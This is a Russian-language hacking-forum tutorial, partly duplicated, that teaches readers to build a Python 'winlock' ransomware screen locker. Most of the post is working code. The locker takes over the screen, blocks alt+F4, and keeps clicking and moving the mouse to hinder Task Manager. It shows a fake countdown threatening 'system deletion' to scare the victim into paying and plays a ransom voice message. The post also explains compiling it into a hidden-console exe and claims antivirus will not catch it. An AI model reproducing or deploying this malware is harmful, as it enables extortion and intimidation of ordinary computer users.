HHIDE_DUMP
Гость
H
HHIDE_DUMP
Гость
Копипаст
Всем привет! В этой статье мы с вами напишем локер для компьютера,на базе Windows или UNIX систем. Наша программа будет блокировать систему пользователя,пока он не введет пароль.В простонародье данный вирус называют "
Посмотреть вложение 7361Посмотреть вложение 7362Посмотреть вложение 7363
Для написания вы можете использовать обычный IDLE от питона,или любой другой.
Для начала мы должны к нашей программе подключить нужные нам библиотеки. Библиотека - написанные коды/функции,которые подключаются к нашей программе.
__________________________________________________________________________________
Но при запуске нам выдаст ошибку,указывающую на отсутствие библиотек pyautogui и pygame. Они не являются стандартными и их нужно установить. Для этого выполняем действия как на видео(через систему для установки пакетов мы ставим нужные нам библиотеки)
___________________________________________________________________________________
Дальше мы зададим переменные, которые мы будем использовать.
____________________________________________________________________________________
Почти в самом начале мы должны создать функции. Которые будут отвечать за блокировку компьютера и за проверку на ввод правильного пароля.
Сначала создаем функцию блокировки компьютера.
Теперь мы создаем функцию, которая проверяет, введен ли правильный пароль.
____________________________________________________________________________________
Дальше мы должны создать окно нашего локера,которое откроется на весь экран.
_____________________________________________________________________________________
Теперь мы создадим объекты для нашей программы - кнопку,поле для ввода и надписи.
______________________________________________________________________________________
У нас есть кнопка и она должна что-то делать. В нашем случае при нажатии на кнопку будет выполняться проверка на правильность пароля.
______________________________________________________________________________________
До этого мы просто создали переменные с объектами,а теперь эти объекты нужно отобразить/отрисовать на экране.
(используем функцию .place(), которая принимает значения x и y - координаты)
_______________________________________________________________________________________
В winlock-ерах принято оставлять сообщения с информацией,требованием перевода денег. Я решил, что оставлять текстовое сообщение - слишком банально, и при запуске нашего вируса будет проигрываться голосовое сообщение.
Голосовое сообщение я сделал с помощью этого сервиса -
_______________________________________________________________________________________
Дальше мы должны обновить наш экран и выполнить нажатие на поле для ввода.
________________________________________________________________________________________
Теперь мы должны запустить цикл, который будет работать,пока от пользователя мы не получим правильный пароль.
После установки мы должны открыть папку с нашей программой на питоне и запустить pyinstaller с такими аргументами
-F соберет все файлы в один exe файл
-w отключит консоль
-i *путь к иконке* аргумент,который подключит к программе иконку
Смотрим видео!)
После в папке dist появится наш код скомпилированный в EXE. У него есть 2 минуса.
!!!ВАЖНО - пароль от локера
Вот мы и написали наш простой локер, да диспетчер задач и комбинации alt+tab будут работать, но из-за постоянных кликов - сложно убить процесс. Наш вирус не будет палится антивирусами, ведь им не на что реагировать. В нашей программе нету взаимодействия с системой пользователя.
Словарик
IDLE/IDE - среда для разработки программного обеспечения.
Библиотека/модуль - написанные коды/функции,которые подключаются к нашей программе.
pip - система для установки пакетов(Для Python).
Переменная - ячейка в памяти,которая имеет свое уникальное название и может хранить определенную информацию
Функция - часть кода, который имеет свое уникальное название по которому его можно запустить/вызвать
Цикл - действие, которое будет повторятся N-ное количество раз и может зависит от определенного условия
_______________
Вся информация написана в целях ознакомления,автор не несет ответственность за использование данного материала)
Всем привет! В этой статье мы с вами напишем локер для компьютера,на базе Windows или UNIX систем. Наша программа будет блокировать систему пользователя,пока он не введет пароль.В простонародье данный вирус называют "
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
"Установка Python
Переходим на официальный сайт PythonА - Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Скачиваем последнюю версию и устанавливаем ее.Посмотреть вложение 7361Посмотреть вложение 7362Посмотреть вложение 7363
Суть работы программы
Наш вирус будет работать по такому принципу. Программа открывается на весь экран,у нее нет кнопки закрыть. Доступно поле для ввода пароля и кнопка для разблокировки. Пока жертва не введет правильный пароль,мышка будет постоянно кликать на кнопку,и переводить туда курсор. Это будет мешать пользователю свернуть окно или убить его через диспетчер задач. Так же будет таймер отсчитывающий время до удаления системы. На самом деле,он ничего не удалит, но хорошо припугнут жертву и например заставит скорее перевести деньги. По истечении времени таймер сменится на надпись - "Удаление системы" Вот и вся суть программы)Начинаем кодить
#Комментарии к коду будут помечены #комментарийДля написания вы можете использовать обычный IDLE от питона,или любой другой.
Для начала мы должны к нашей программе подключить нужные нам библиотеки. Библиотека - написанные коды/функции,которые подключаются к нашей программе.
Код:
from tkinter import * #говорим питону с библиотеки tkinter импортировать все
import pyautogui #говорим питону импортировать библиотеку pyautogui
import pygame #говорим питону импортировать библиотеку pygame
Но при запуске нам выдаст ошибку,указывающую на отсутствие библиотек pyautogui и pygame. Они не являются стандартными и их нужно установить. Для этого выполняем действия как на видео(через систему для установки пакетов мы ставим нужные нам библиотеки)
___________________________________________________________________________________
Дальше мы зададим переменные, которые мы будем использовать.
Код:
read1ng=" " #переменная, в которой будет храниться введенный пользователем пароль
password=("vlmi") #переменная с паролем от локера, можно установить что-то свое
t1me=7200 #переменная с временем таймера в секундах.
d3l="Удаление системы..." # переменная для отображения на экране текстового сообщения
____________________________________________________________________________________
Почти в самом начале мы должны создать функции. Которые будут отвечать за блокировку компьютера и за проверку на ввод правильного пароля.
Сначала создаем функцию блокировки компьютера.
Код:
def block(): #создаем функцию, которая называется block
pyautogui.click(x=675,y=405) #делаем клик по координатам X и Y
pyautogui.moveTo(x=675,y=405) #переводим мышку в позицию координат X и Y
screen.protocol("WM_DELETE_WINDOW",block) #Запрещаем использование комбинаций F4/alt+F4/Fn+F4, и при их использовании вызывает функцию block
screen.update() #переменную с нашим экраном мы обновляем.
Код:
def password_check(event): #создаем функцию, которая называется password_check, и имеет аргумент event
global read1ng #создаем глобальную переменную read1ng.
read1ng=field.get() #переменной read1ng мы присваиваем значение,которое мы считаем(.get) с поля для ввода(field).
if read1ng==password: #создаем условие,если переменная read1ng равняется переменной password,то:
screen.destroy() #окно программы(screen) мы уничтожаем/закрываем
____________________________________________________________________________________
Дальше мы должны создать окно нашего локера,которое откроется на весь экран.
Код:
screen=Tk() #screen - это просто название переменной. Которой мы присваиваем ему создания окна приложения
screen.title("WinLock vlmi.su") #задаем нашему окну название/заголовок.
screen.attributes("-fullscreen",True) #задаем окну атрибут - "на весь экран",который является правдой/активным.
screen.configure(background="#1c1c1c") #устанавливаем фоновой цвет на наше окно.
pyautogui.FAILSAFE=False #отключение остановки библиотеки autogui при дерганьи мышки. Если не включить это, то при дергание мышки pyautogui просто прекратит выполнять все действия.
_____________________________________________________________________________________
Теперь мы создадим объекты для нашей программы - кнопку,поле для ввода и надписи.
Код:
field=Entry(screen,fg="green",justify=CENTER) #создаем переменную,которая равняется полю для ввода,которое расположено на нашем окне(screen),цвет для текста - зеленый, текст будет по центру.
but=Button(screen,text="Разблокировать") #создаем переменную,которая равняется кнопке,которая расположена на нашем окне(screen),и имеет на себе надпись("Разблокировать")
text0=Label(screen,text="Ваша система заблокирована!",font="TimesNewRoman 30",fg="white",bg="#1c1c1c") #создаем переменную,которая равняется надписи,имеет свой текст, шрифт и размер, цвет текста фона.
text=Label(screen,text="Danaforevr для конкурса VLMI.SU",font="TimesNewRoman 30",fg="#32CD32",bg="#1c1c1c") #тоже самое,что и выше
text1=Label(screen,text="Не перезагружайте компьютер, это удалит вашу систему!",font = "TimesNewRoman 16",fg="red",bg="#1c1c1c") #тоже самое,что и выше
l=Label(text=t1me,font="Arial 22",fg="red",bg="#1c1c1c") # так же как и выше,только здесь текст равен переменной(t1me),которая стоит у нас в начале и имеет значение 7200.
l1=Label(text="До удаления системы осталось:",fg="white",bg="#1c1c1c",font="Arial 15") #простая надпись как и выше
______________________________________________________________________________________
У нас есть кнопка и она должна что-то делать. В нашем случае при нажатии на кнопку будет выполняться проверка на правильность пароля.
Код:
but.bind('<Button-1>',password_check) #к переменной but(нашей кнопке) мы привязываем функцию password_check,которая выполнится при нажатии ЛКМ
До этого мы просто создали переменные с объектами,а теперь эти объекты нужно отобразить/отрисовать на экране.
(используем функцию .place(), которая принимает значения x и y - координаты)
Код:
text.place(x=380,y=180) #переменную text мы отображаем на координатах X и Y
field.place(width=150,height=50,x=600,y=300) #переменной field мы устанавливаем ширину,высоту и отображаем на координатах X и Y
but.place(width=150,height=50,x=600,y=380) #переменной but мы устанавливаем ширину,высоту и отображаем на координатах X и Y
text0.place(x=410,y=100) #переменную text0 мы отображаем на координатах X и Y
text1.place(x=410,y=250) #переменную text1 мы отображаем на координатах X и Y
l1.place(x=20,y=70) #переменную l1 мы отображаем на координатах X и Y
l.place(x=20,y=100) #переменную l мы отображаем на координатах X и Y
_______________________________________________________________________________________
В winlock-ерах принято оставлять сообщения с информацией,требованием перевода денег. Я решил, что оставлять текстовое сообщение - слишком банально, и при запуске нашего вируса будет проигрываться голосовое сообщение.
Голосовое сообщение я сделал с помощью этого сервиса -
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
. Музыка/сообщение должно быть в формате .wav, можно использовать конвертеры.
Код:
pygame.init() #мы запускаем код с библиотеки, которую мы импортировали.
aud=pygame.mixer.Sound("message.wav") #создаем переменную которая являться подключением звукового файла,который называется message.wav
aud.play() #запускаем нашу переменную на воспроизведение.
_______________________________________________________________________________________
Дальше мы должны обновить наш экран и выполнить нажатие на поле для ввода.
Код:
screen.update() #переменную с нашим экраном мы обновляем.
pyautogui.click(x=675,y=325) #делаем клик по координатам X и Y
pyautogui.moveTo(x=660,y=410) #переводим мышку в позицию координат X и Y
________________________________________________________________________________________
Теперь мы должны запустить цикл, который будет работать,пока от пользователя мы не получим правильный пароль.
Код:
while read1ng!=password: #запускаем цикл,который работает пока переменная read1ng не равняется переменной password
l.configure(text=t1me) #изменяем конфигурацию переменной l, а точнее - меняем значение text="" на переменную t1me
screen.after(300) #делаем задержку в 300 миллисекунд.
if t1me==0: #условие,если переменная t1me равна 0, то :
t1me=d3l #переменной time присваивается переменная d3l
#Это нам нужно для работы с таймером, если таймер дойдет до нуля,отчет должен просто остановится. В нашем случае вывести текст про удаление системы.
if t1me!=d3l: #условие,если переменная t1me равна переменной d3l, то :
t1me=t1me-1 #переменная t1me равна переменной time от которой отняли 1
block() #вызываем функцию block , она у нас в самом начале
#Это все будет повторяться, пока пользователь не введет правильный пароль.
Компилируем в exe
При запуске программы(F5) все будет работать, но распространять код и установщик питона, это явно не лучший вариант. Поэтому мы наш код скомпилируем в exe файл. Для этого мы через pip установить специальную программу.Смотрим видео!)После установки мы должны открыть папку с нашей программой на питоне и запустить pyinstaller с такими аргументами
-F соберет все файлы в один exe файл
-w отключит консоль
-i *путь к иконке* аргумент,который подключит к программе иконку
Смотрим видео!)
После в папке dist появится наш код скомпилированный в EXE. У него есть 2 минуса.
- Большой вес, исправить можно удалив голосовое сообщение,и заодно отключить импорт pygame.
- Долгий запуск, это происходит из за сбора всех файлов в один. Наш exe можно назвать архивом, который распаковывается в временную папку. Этого можно избежать не собирая все в один файл.
Исходники и заключение
Скачать готовую программу и исходники вы можете по ссылке - Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
!!!ВАЖНО - пароль от локера
Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.
Вот мы и написали наш простой локер, да диспетчер задач и комбинации alt+tab будут работать, но из-за постоянных кликов - сложно убить процесс. Наш вирус не будет палится антивирусами, ведь им не на что реагировать. В нашей программе нету взаимодействия с системой пользователя.
Словарик
IDLE/IDE - среда для разработки программного обеспечения.
Библиотека/модуль - написанные коды/функции,которые подключаются к нашей программе.
pip - система для установки пакетов(Для Python).
Переменная - ячейка в памяти,которая имеет свое уникальное название и может хранить определенную информацию
Функция - часть кода, который имеет свое уникальное название по которому его можно запустить/вызвать
Цикл - действие, которое будет повторятся N-ное количество раз и может зависит от определенного условия
_______________
Вся информация написана в целях ознакомления,автор не несет ответственность за использование данного материала)